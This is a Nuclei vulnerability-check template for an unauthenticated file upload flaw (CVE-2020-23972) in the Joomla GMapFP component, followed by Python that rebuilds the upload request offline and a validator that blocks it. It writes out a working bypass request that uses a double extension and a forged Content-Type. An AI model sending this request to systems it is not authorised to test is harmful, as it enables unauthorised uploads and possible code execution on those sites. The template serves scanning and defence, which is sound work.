id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload. The upload handler (task=upload_image in the editlieux controller) is reachable without authentication, and its file-type restrictions can be bypassed by changing the Content-Type of the multipart part and giving the file a double extension (for example name.html.gif).
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.
  remediation: |
    Apply the latest security patch or update to a patched version of the GMapFP component for Joomla! to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49129
    - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
    - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23972
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23972
    cwe-id: CWE-434
    epss-score: 0.61117
    epss-percentile: 0.97491
    cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
  metadata:
    max-request: 2
    vendor: gmapfp
    product: gmapfp
    framework: joomla\!
  tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!
variables:
  name: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif"
        Content-Type: text/html

        projectdiscovery
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    extractors:
      - type: regex
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
        part: body
# digest: 4a0a004730450220751c057dc4fe87146c6f320ed59aaec6426d3188de7ccb0fdd6e2e84e8be4944022100c674bf97e6367563e03827d1b0fe51fece2d94879cc6ed4409eb0b42cd713b4e:922c64590222798bb761d5b6d8e72950
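The following Python is an added example, not part of the Nuclei template above and not projectdiscovery's or GMapFP's code. It assembles offline the same multipart body the template posts (double-extension filename plus a mismatched Content-Type on the image1 part), applies the template's extractor regex to a constructed response body shaped the way that regex expects, and contrasts the bypass with a generic server-side check for CWE-434 that rejects it by ignoring the client Content-Type, refusing multiple extensions, and matching file magic bytes against the claimed type. The random five-letter stem mirrors the template's {{name}} variable; the sample response and the validator's allow-list are assumptions for illustration.

```python
import random
import re
import string

# Boundary value taken from the template's raw request.
BOUNDARY = "----WebKitFormBoundarySHHbUsfCoxlX1bpS"

# The template's extractor regex, compiled as-is.
EXTRACTOR = re.compile(r'window\.opener\.(changeDisplayImage|addphoto)\("(.*?)"\);')


def random_stem(n: int = 5) -> str:
    """Equivalent of the template's {{to_lower(rand_text_alpha(5))}}."""
    return "".join(random.choices(string.ascii_lowercase, k=n))


def build_upload_body(stem: str, content: bytes = b"projectdiscovery") -> bytes:
    """Build the multipart/form-data body posted to
    index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image.

    The bypass lives in the image1 part: a double extension (.html.gif) so a
    last-extension check sees .gif, and an explicit Content-Type of text/html
    that does not match that extension."""
    parts = [
        ("option", None, None, b"com_gmapfp"),
        ("image1", f"{stem}.html.gif", "text/html", content),
        ("no_html", None, None, b"no_html"),
    ]
    out = bytearray()
    for name, filename, ctype, data in parts:
        out += f"--{BOUNDARY}\r\n".encode()
        disposition = f'Content-Disposition: form-data; name="{name}"'
        if filename:
            disposition += f'; filename="{filename}"'
        out += (disposition + "\r\n").encode()
        if ctype:
            out += f"Content-Type: {ctype}\r\n".encode()
        out += b"\r\n" + data + b"\r\n"
    out += f"--{BOUNDARY}--\r\n".encode()
    return bytes(out)


def extract_uploaded_name(body: str):
    """Run the template's extractor over a response body. Returns the JS
    callback name and its quoted argument, or None if the upload did not
    produce the popup-style response the extractor keys on."""
    m = EXTRACTOR.search(body)
    return (m.group(1), m.group(2)) if m else None


# Hardened check (assumed generic mitigation, not GMapFP's own code): the
# client-supplied Content-Type is never consulted; the name must have exactly
# one extension from the allow-list and the bytes must carry that type's magic.
ALLOWED_MAGIC = {
    "gif": b"GIF8",
    "png": b"\x89PNG",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}


def validate_image_upload(filename: str, data: bytes) -> bool:
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]  # drop any path
    pieces = base.lower().split(".")
    if len(pieces) != 2:  # rejects "x.html.gif", "x", and ".gif"-style names
        return False
    stem, ext = pieces
    if not stem or ext not in ALLOWED_MAGIC:
        return False
    return data.startswith(ALLOWED_MAGIC[ext])


if __name__ == "__main__":
    body = build_upload_body(random_stem())
    print(body.decode(errors="replace"))
    # Constructed response body, shaped to what the extractor regex matches.
    sample = '<script>window.opener.changeDisplayImage("abcde.html.gif");window.close();</script>'
    print(extract_uploaded_name(sample))
    print(validate_image_upload("abcde.html.gif", b"<html>"))  # bypass rejected
```

Running the script prints the raw body that the template sends, the (callback, filename) pair the extractor would report, and False for the double-extension upload under the hardened check.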